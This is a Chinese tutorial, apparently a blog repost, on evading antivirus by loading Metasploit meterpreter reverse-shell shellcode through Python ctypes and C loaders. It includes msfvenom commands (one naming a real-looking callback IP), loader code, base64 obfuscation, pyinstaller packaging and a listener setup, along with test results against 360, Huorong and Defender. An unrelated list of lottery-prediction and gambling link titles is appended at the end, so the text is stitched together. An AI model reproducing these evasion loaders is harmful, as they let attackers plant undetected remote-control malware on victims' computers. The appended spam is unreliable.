免杀初探:python加载shellcode免杀与国内主流杀软大战六个回合腾讯云开发者社区

注:以下实验截图均为本人发稿时重新测试所截

ctypes是Python的外部函数库。它提供了与C兼容的数据类型,并允许调用DLL或共享库中的函数。具体可参考文末的官方文档

动态链接库是微软公司在微软Windows操作系统中,实现共享函数库概念的一种方式。其后缀名多为.dll,dll文件中包含一个或多个已被编译、链接并与使用它们的进程分开存储的函数。我们经常在程序安装目录下看到它们。

可直接将python语言编写的py程序打包为exe可执行文件,而不需要安装python环境即可直接运行。使用pip安装即可

打包常用命令:

pyinstaller-F-wx.py4.shellcodeshellcode是一段用于利用软件漏洞而执行的代码,格式为16进制的机器码。因为经常让攻击者获得shell而得名。shellcode常常使用底层语言编写,如c/c++,汇编。

注意:shellcode是16进制格式的,字节流的数据,很底层。所以我们需要了解下它的执行过程,分为四步:(1)申请一片内存;(2)将shellcode放到申请的内存当中;(3)创建线程;(4)执行。了解了这个过程,就好理解后面的代码了

Win10系统中自带的防护软件,默认开启,当用户安装了别的防病毒软件时,会自己关闭,需要用户自己手动开启。

本机win10x64位安装了火绒安全软件,visualstudio2019,pycharm,python3.9.5x64位

腾讯云服务器:debian10,添加了kali源,安装了msf

测试机器1:虚拟机win10x64位,不安装任何杀毒软件,使用自带的windowsdefender

测试机器2:虚拟机win10x64位,安装了电脑管家,360安全卫士,360杀毒

测试机器3:虚拟机win7x64位,不能执行win10下用pyinstaller打包的成的exe文件,安装了电脑管家,360安全卫士,360杀毒,测试杀软的静态查杀能力

注:本文中所有杀软均为默认设置,且病毒库升级到最新

首先我们来生成一个简单的dll文件,打开visualstudio2019创建一个动态链接库(dll)项目,可以看到预写入一些代码,我们不用管它,直接加入以下代码:

extern“C”:这里由于文件后缀为.cpp,即c++文件,而ctypes只能调用C函数,c和c++编译方式又不太一样,如果在编译时把c的代码用c++方式编译,会产生错误。故在c++引入c的库时要加extern“C”

voidTestCtypes():定义一个返回为空,名为TestCtypes的函数,该函数是打印helloworld!

接下来,点击生成→生成解决方案即可生成一个.dll文件

那么如何使用python加载dll,并调用里面的函数呢?

很简单,几行代码搞定:

最后将刚才生成的DLL文件放到py文件同目录下,运行py文件:

注意这里有坑,如果你的python是64位的,生成dll文件时debug一定要选x64,不然运行py文件调用dll时会报错,32位python就是默认的x86

我们先用msf生成一段C的shellcode

msfvenom-pwindows/meterpreter/reverse_tcplhost=x.x.x.xlport=8080-fc打开visualstudio创建一个空项目Project1,在源文件中新建一个shell.c文件

下面的代码是网上公开的最简单的一段执行shellcode的代码

#include#include#include#pragmacomment(linker,"/subsystem:\"Windows\"/entry:\"mainCRTStartup\"")//windows控制台程序不出黑窗口unsignedcharbuf[]=”shellcode”main(){char*Memory;Memory=VirtualAlloc(NULL,sizeof(buf),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);//申请一块可读写可执行的内存,sizeof()为C语言中计算字节的函数memcpy(Memory,buf,sizeof(buf));//将shellcode拷贝到申请的内存当中((void(*)())Memory)();return0;}unsignedcharbuf[]是定义一个无符号字符串数组变量buf,shellcode就是把刚才msf中生成的shellcode带引号和分号拷贝过来

VirtualAlloc()函数的作用是申请一块内存空间

参数:

LPVOIDVirtualAlloc{

LPVOIDlpAddress,//要分配的内存区域的起始地址

DWORDdwSize,//分配的大小

DWORDflAllocationType,//分配的类型

DWORDflProtect//该内存的初始保护属性

};

MEM_COMMIT|MEM_RESERVE表示为指定地址空间提交物理内存或保留指定地址空间,不分配物理内存

PAGE_EXECUTE_READWRITE表示可读写可执行

Memcpy()内存拷贝函数,函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中

语法参数:

void*memcpy(void*destin,void*source,unsignedn);

destin--指向用于存储复制内容的目标数组,类型强制转换为void*指针。

source--指向要复制的数据源,类型强制转换为void*指针。

n--要被复制的字节数。

在刚开始学习的时候一定要注意理解网上已有的公开代码,这样后面会越学越轻松的,另外就算我们对某种语言不了解,看函数名也能大致知道函数的作用了,这就是学习方法。

将代码编写好,最后点击生成→生成解决方案,将其编译为exe文件

注意此处有坑,生成解决方案时请在工具栏中选择releasex86,不然会报如下错,win7,win10都一样

看下免杀效果:火绒,360,defender直接查杀

电脑管家没报毒(轻松绕过,后面可以直接关闭,无视它了)

msf开启监听:

useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhost0.0.0.0setlport8080执行exe,测试机器2成功上线,并能执行命令:

将生成的exe文件上传到Virustotal.com看下查杀率:30/67

在网上公开的代码中,主要有两种写法

简单点的:

#调用kernel32.dll动态链接库中的VirtualAlloc函数申请内存rwxpage=ctypes.windll.kernel32.VirtualAlloc(0,len(shellcode),0x3000,0x40)#调用kernel32.dll动态链接库中的RtlMoveMemory函数将shellcode移动到申请的内存中ctypes.windll.kernel32.RtlMoveMemory(rwxpage,ctypes.create_string_buffer(shellcode),len(shellcode))#创建线程并执行shellcodehandle=ctypes.windll.kernel32.CreateThread(0,0,rwxpage,0,0,0)ctypes.windll.kernel32.WaitForSingleObject(handle,-1)复杂点的:

#调用kernel32.dll动态链接库中的VirtualAlloc函数申请内存ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))buf=(ctypes.c_char*len(shellcode)).from_buffer(shellcode)#调用kernel32.dll动态链接库中的RtlMoveMemory函数将shellcode移动到申请的内存中ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(shellcode)))#创建线程并执行shellcodeht=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))本人在实验过程中第二种写法没运行成功过,故本文的实验都是在第一种写法的代码上进行的,来大致解释下各个函数的意义:

windll是载入动态库的方法,kernel32是win32系统的动态库,由此可以知道ctypes对win32的系统和程序会有较好的支持,对于64位的程序可能并不那么友好(手动捂脸)

VirtualAlloc这个与C中的具有一样的功能,参数也是一样,0x3000就是表示MEM_COMMIT|MEM_RESERVE,0x40就是PAGE_EXECUTE_READWRITE,可读写可执行,这个百度一下C语言的VirtualAlloc函数就知道了

RtlMoveMemory与2中的memcpy函数一样,这里就不过多解释,想深入了解的可以搜下

create_string_buffer()将shellcode写入内存中,python的byte对象是不可以修改的.如果需要可改变的内存块,需要create_string_buffer()函数

CreateThread()和WaitForSingleObject()

请参考:

本文只讨论使用python-ctypes模块加载shellcode的免杀思路和效果

在进行免杀对抗前,先来了解下杀软的查杀原理:

一般是匹配特征码,行为监测,虚拟机(沙箱),内存查杀等。360和火绒主要使用特征码检测查杀病毒(云查杀也是特征码检测)。

Msf中生成payload:

msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=x.x.x.xlport=8080-fc注意:我的python是64位的,在我的环境中如果采用windows/meterpreter/reverse_tcp这个payload,最后实验会失败;但在一些x64的python中又是可以的,这里大家多尝试

上代码:

importctypesshellcode=b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"shellcode+=b"\x48\x31\xd2\x51\x65\x48\x8b\x52\x60\x56\x48\x8b\x52\x18\x48".....................shellcode+=b"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5"ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64rwxpage=ctypes.windll.kernel32.VirtualAlloc(0,len(shellcode),0x3000,0x40)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage),ctypes.create_string_buffer(shellcode),len(shellcode))handle=ctypes.windll.kernel32.CreateThread(0,0,ctypes.c_uint64(rwxpage),0,0,0)ctypes.windll.kernel32.WaitForSingleObject(handle,-1)可以看到这里加载执行shellcode的代码和上面是不太一样的,这是我环境的特殊性(再次捂脸),但在一些x64位的环境中又是没问题的,造成这样的原因是x86和x64的兼容性问题。具体的原因分析请参考文末的参考链接

经过测试,这里将c_uint64改为c_int64,c_void_p都能成功,

运行ms1.py,能成功上线并执行命令

打包:

pyinstaller-F-wms1.py注意:由于我是在windows10上打包的,所以打包后的exe只能在win10上运行,win7运行不了,且在打包过程中有这样的信息:

看下免杀效果:

360安全卫士,360杀毒居然没报!惊呆了

点击执行,测试机器2成功上线并能执行命令

本机火绒没杀,扫描时报毒,扫描界面开启时,点击程序并不能执行,但将扫描界面关闭,再点能成功上线并执行命令。

这教育我们别自己作,如果下载的破解版软件用杀软扫描报毒,别再运行了,除非你想当肉鸡(狗头)

windowsdefender没查杀,运行后上线,但随后连接被断开,且defender自动将程序杀掉,强,动态查杀

将ms1.exe文件上传到Virustotal.com看下查杀率:11/67

Msf生成shellcode:

msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=1.14.97.186lport=8080--encryptbase64-fc上代码:

运行py成功并上线

pyinstaller打包,看下免杀效果:

测试机器3上扫描没报毒,拖到测试机器2上提示这个,点击允许,360扫描ms2.exe没报毒

有点奇怪,之前实验时没报这个。这里反复试验了几次,给文件改名也会弹出这个,点击允许,再用360扫描没报毒,ms2.exe直接不能拖进去

执行程序又能成功上线,很迷,我只能理解为360杀毒是不是不稳定,请大佬赐教。

windowsdefender没查杀,运行后上线,但随后连接被断开,且defender自动将程序杀掉,又是动态查杀,强!

火绒和第一回合结果一样

将ms2.exe文件上传到Virustotal.com看下查杀率:10/67

1.写个python脚本将生成的经过编码的shellcode进行去空和去掉换行后,上传到服务器

代码:

360扫描没报毒,执行后能够成功上线并执行命令

火绒和前两个回合一样

Defender动态查杀

Virustotal查杀率:9/66

免杀效果:完美干掉360和火绒(注:这里执行代码不用全部编码也能过火绒,具体参考文末链接)

注:在本人前面的实验中,前三个回合火绒都是瞬间查杀的

Virustotal查杀率:9/65

Virustotal查杀率:10/66

微步云沙箱:3/25

前面说过虽然所有杀软病毒库为最新,但都是默认设置,后面检查了发现360杀毒和火绒都没啥,主要是360安全卫士,默认是这样的

后面两个需要自己点击去下载,人工智能引擎倒没啥,主要是鲲鹏引擎很强大,加了鲲鹏后,全部报毒

但如果用户下载的是破解软件,报毒也要安装的话,也会成功上线,如果不执行添加用户这样的敏感操作的话,360也不会提示,在这点上倒是win10自带的defender更强大。

综合本文记录的实验结果和自己前面几次实验来看,我有如下结论:

1.默认设置下,杀毒能力火绒>360安全卫士=360杀毒>腾讯电脑管家,当360安全卫士添加了鲲鹏引擎后,杀毒能力比其他的都强

2.几款主流杀软都有一个痛点,如果当前网络状态不好,势必会对查杀效果有影响;另外如果用户错误点击了带有免杀的木马,并不会有主动断开连接的操作

3.win10普通用户,如果不是特别需要用到几款主流杀软的一些功能,如:360的软件管家、火绒的火绒剑,用自带的defender足够了

这里先讲几个概念:生成器,加载器,打包器,加密器,执行器

本文中我们是用msf生成的C的shellcode,msf就叫生成器

使用python的ctypes模块加载shellcode,ctypes就叫做加载器

用pyingstaller将代码打包成exe,pyinstaller就叫打包器

选用base64编码对代码进行混淆,base64这就加密/编码器

我们是通过ctypes调用并执行C的函数,这就是执行器,网上也有很多shellcode生成器,有其特殊的机制去将代码执行或生成exe

对于生成器的选择,可以有msf,CobaltStrike(CS)等

加载器的选择,可以有ctypes,c/c++,ruby,c#,go语言等

打包器的选择python中就有pyinstaller,py2exe,编译方式不一样,免杀效果也不一样

加密器的选择有base64,hex,异或,AES,RSA

把这些选择排列组合一下是不是就会有很多方式了?

我们还可以将执行shellcode的函数写到dll文件中,然后通过exe去调用

免杀的技术方法还有dll替换,资源文件修改,签名,特征码定位,加壳,改变生成shellcode时的参数,套娃(如:编码之后加密再加密)等等

思路是不是一下就开阔了起来。学免杀一定要学原理,只是把网上的一些免杀代码进行编译,或是利用工具生成,这些都没啥用,工具特征码迟早会被检测到,如果工具没更新了,自己是不是就没办法了(迪总语录)。而且别人写的这种工具会不会留有后门。所以还是自己动手,丰衣足食。

本文所讲述的免杀方法很初级,但这些方法,目前绕过国内默认配置的主流杀软是没问题的,就算以后被检测出来了,我们需要做的就是改变下思路,会编写点代码就行了,免杀是如此丰富多彩。

小迪师傅ctypes免杀原文

python-ctypes官方文档

python使用ctypes库调用DLL动态链接库

Pythonx64下ctypes动态链接库出现accessviolation的原因分析

THE END
1.2024年P5327期十大专家精准杀号定胆汇总万位杀号码:12479 千位杀号码:68 百位杀号码:23578 十位杀号码:02 个位杀号码:389 万位三胆:358 双胆:38 千位三胆:457 双胆:45 百位三胆:069 双胆:06 十位三胆:145 双胆:15 个位三胆:157 双胆:57 ===ydniu.com排列5十大专家杀号定胆汇总 专家破https://www.ydniu.com/info/pl5/cpyc/148320241205.html
2.高手对局2024330期排列五预测精准一注本期“高手对局”排列五杀号如下: ↓符合条件区↓ 第一位杀码:1 第二位杀码:5 第三位杀码:6 第四位杀码:0 第五位杀码:1 单挑一注:75247成绩展示: 【彩市独胆人】3D332期独5中(独10中8) 【东北海哥】3D332期独5中(双17错2) 【黄皮子独胆】3D332期独胆5中。 【定位独胆王】3D332期独胆5中。https://wap.ssqzj.com/read_7667553.html
3.排列三杀号定胆最准确排列3杀号技巧排列五专家杀号【排列三中大奖天天彩经网】排列三杀号定胆、排列3杀号技巧、排列五专家杀号、排列5预测杀号,多位排列三五大牛专家在线为你推荐胆码杀号https://m.cjcp.cn/shahao/p3/
4.360排列五杀号定胆100%准2020最新版下载360排列五杀号定胆100%准2020这个平台中的数据是非常具有参考价值的,能够很好的帮助各种各样的彩民朋友,了解到最新的彩票走势情况,在这个平台中可以随时随地查询全国的开奖号码,了解彩票的最新动态情况,是一个非常好用的平台。 《360排列五杀号定胆100%准2020》软件优点: https://www.1ting.com/ruanjian/29044.html
5.排列三杀号360选号技巧:巧用和值杀号法很多喜爱排列三的彩民朋友,经过多年的分析研究,总结出了一些实用的杀号定胆方法。今天介绍的巧用和值杀号法,是一位彩民朋友购买排列三过程中常用的选号方法,大家不妨借鉴一下 P3杀号方法-巧用合值杀号法。 在说方法之前,先简单的说下涉及到的术语-合值。通俗说,合值就是开奖号码的和值尾数。举例:2008203期https://www.17500.cn/arts/sdetail-10768754.html
6.排列三杀号定胆【排列三专家杀号定胆】提供排列三十大专家杀号、排列三胆码预测、排列三定胆、组选杀号公式等功能,科学准确,中奖率高,还有排列三杀号方法和定胆技巧,可查询近100期杀号定胆数据。https://expert.78500.cn/p3/game/
7.100期排列三直选百十个位杀号(360专家)100期 排列三直选百十个位杀号(360专家) 直选百位杀号 期号 开奖号码 雁枫杀号 乐蓉杀号 白凡杀号 芸遥杀号 远锋杀号 智天杀号 南宫杀号 元丰杀号 浩轩杀号 萧寞杀号 统计 2015081 6 0 3 7 5 6 4 8 2 1 4 6 0 8 2015082 2 5 5 0 0 8 4 2 7 4 7 2 8 8https://m.800820.net/p/1480946.html
8.红日排列5预测302期定胆杀号点击查看更多排列5预测目前体彩排列5第24302期正在热售中,排列5玩法支持多种方式进行投注,彩民朋友可以选择普通投注、定胆投注、过滤投注等多种方式,欢迎彩民朋友利用本站提供各种排列5走势图、排列5预测、排列5杀号等热门内容进行选号和投注,预祝更多彩民朋友可以分享到排列5大奖!https://zx.okooo.com/news/6730bc9783da506f1e12c360/
9.排列三杀号排列三杀号排列三杀号定胆排列3杀号定胆排列三预测 排列三杀号 排列三胆码 排列三字谜 双色球预测 双色球字谜 双色球杀号 体彩大乐透 七星彩 七乐彩 3D走势图 排列五 3d开机号 3d试机号 排列三试机号 3D走势图 排列三走势图 3D论坛 排列三论坛 双色球论坛 马后炮解太湖 彩吧开奖 https://www.55125.cn/p3/shama/
10.排列五开奖杀号360精准解密排列五排列五开奖杀号360精准解密,今天小编给大家介绍一下体育彩票排列五的更多玩法及专家资讯推荐方案,如果你也对此感兴趣的可以跟着小编一起来了解个所以然。https://vipc.cn/tags/pailiewukaijiangshahao360jingzhunjiemi
11.双色球杀号定胆360:查时间之窗探夺大奖双色球杀号定胆360:查时间之窗探夺大奖 小编为您精析双色球出号之黄金定律,欢迎参考。黄金定律由两大部分构成,一部分是黄金周期循环,又称神奇黄金数字,另一部分是黄金分割优选法。 一、黄金周期循环 在数学世界有一组无穷尽的神奇数字,在这组数字中,前后数字存在一种和数的关系,他们是“1、2、3、5、8、13https://m.cz89.com/read_3746481.htm
12.app安卓网址官方苹果新华社首尔12月5日电(记者陆睿 孙一然)韩国最大在野党共同民主党5日在韩国国会对记者说,国会针对总统尹锡悦弹劾动议案的表决拟于7日举行。 1、斧头、拳套、火枪者神需要去铁炉堡找武器训练时学习; 如果玩家们找不到的话可以通过询问城中的卫兵获取武器训练师的位置在哪里。 content="width=device-width,http://www.factbi.com/896791.html
13.官网登录平台入口地址战马获取方法:content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />战马系统来袭“其疾如风,其徐如林;侵掠如火,不动如山”,四大系列战马任你选择,英雄们快来认领你的专属坐骑吧。 三国之刃今天正式更新了战马系统,相信皮梁玩家在3.0.0版中已经玩的十http://www.xzz2022.top/876793.html
14.入口官方网址平台登录content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />据法国媒体报道,过去5年里,巴黎圣母院共收到来自约150个国家和地区的8.46亿欧元捐款,全部用于重建工作。目前重建已花去约7亿欧元,剩余资金将用于后续重建工作。 http://wap.zhefu.fun/187243.html
15.入口苹果登录2、《上古卷轴5》被不少玩家们戏称为“老滚5”,这部作品已经上线11年了,虽然画面绝历辩已经过时,但游戏里面的内容和细节,依旧是无法被超越,巨大的游戏世界,真实的人物设定,以及出色的战斗并缺操作,放到现在也不落后,从发行到现在,这款经典游戏仍然深受玩家们的喜爱,并且现在还有很多关于《上古卷轴5》的MOD,不少http://www.kuxue.cc/309529.html
16.苹果官网网址地址登录直播吧12月4日讯 NBA西部NBA杯C组,独行侠121-116逆转灰熊。 首页 软件 游戏 应用集 专栏 攻略 >今天基本躺赢!欧文14投仅3中拿到10分6板出现4失误 三分4中0-直播吧 玩三国杀的女生-今天基本躺赢!欧文14投仅3中拿到10分6板出现4失误 三分4中0-直播吧 16.48MB 版本V14.28.68http://www.xianqiu.cc/588940.html
17.11选5杀号技巧教你如何准确杀号!希望大家用得上。http://bbs.360.cn/thread-4865425-1-1.html
18.官方地址网址登录--- +81 耐力,有时会增加你的 强度430持续10秒, 1分钟1次 (Sonic Booster) 多 64 强度--- 迷惑附近所有机械类生物, 1分钟CD (Personal Electromagnetic Pulse Generator), 可配合新版自爆小兔(使用,电磁脉冲效果会导致自爆小兔立刻爆炸.新技能:野性生长(等级6)5秒回2000血,3分钟CD -护腕附魔: --- 340 http://www.gongdanzhushou.com/750739.html
19.入口官方网址平台登录如果不打老1,那么一小时稳稳的5次。如果刷老1,那么差不多一小时4次。平均收益为一小时20-30G。老1的话,可以出庄严护腕,有很多人要的,可以代刷,30G一个。这个是看人品的,有时候刷10几次都不会出一个。 【厄运北】 还有就是刷水元素旁边的萨特,可以出恶魔布,我的一个牧师号学了裁缝,可以洗月布,月布http://yxh.alcircle.cn/
20.平台苹果地址app官网求剑侠情缘之类的单机版扮演角色类的游戏。 新华社纽约12月6日电 国际油价6日下跌。 ~还是觉得剑侠系列比较经典 content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> 西藏镇魔曲世档胡 截至当天收盘,纽约商品交易所2025年1月交货的轻质原油期货价格http://www.zhaoweisxj.top/028224.html
21.登录网址app地址安卓您好:手机游戏《稿扰幻想三国》在电脑上玩的话需要在电脑上安装一个安卓模拟器,具体模拟器的安装和使用的话建议您到腾讯电脑管家的安卓游戏里面找一下视频攻略看一下吧,打开腾讯电脑管家的中的软件管理,然后打开软件管理中的安卓游戏,然后在安卓游戏里面搜索就可以看到很多猜羡游戏视频攻略供您研究参考哦。例如下图:http://www.medica1.net/076191.html
22.登录?站点进入网站?专属4949澳门开奖现场开奖直播,8028vip彩票网,175平台下载后打不开,16路c0M,11选5杀号技巧2019年澳门赌场排行榜,hl85.co,尊龙官网登录入口.蒂凡尼分.中国,0_10_88必发官网唯一官网,澳洲幸运5的官方玩法2048核基地 地址,365平台,118图库彩图app下载,08vip欢乐国际登陆,杏耀官网网站中心52g.app历史记录查询人和动物,http://m.mdlidnv.cn/20241212/6352.html
23.尊享限量福利,抢注必享:平台登录站点抢先免费一级域名网站有哪些,www.520519.com,haha0008.xyz,亚博全站APP登录下载网址,9W5.CC玩彩网3830119,一定牛开机号,168棋牌官网最新版,www.h8248.cn,排列三综合版的最新版本更新内容 腾辉彩网官网注册入口 mt421ti.vip.9527 准香港漫画资料 七彩开奖号码 彩金彩票资源平台 一分赛车平台网址 366博彩 www3403http://m.ududndjn123.cn/20241210/737791195.html
24.登录官网安卓地址app进入地雷区,务必小心,沿着画面下方走可减少地雷和弓箭威胁。 替补火力!杰罗姆上半场5中3得到12分1助 罚球6中6-直播吧 首页 软件 游戏 应用集 专栏 攻略 下载替补火力!杰罗姆上半场5中3得到12分1助 罚球6中6-直播吧安装你想要的应用 更方便 更快捷 发现更多 87%好评(01人) 82http://www.ylvr.top/188590.html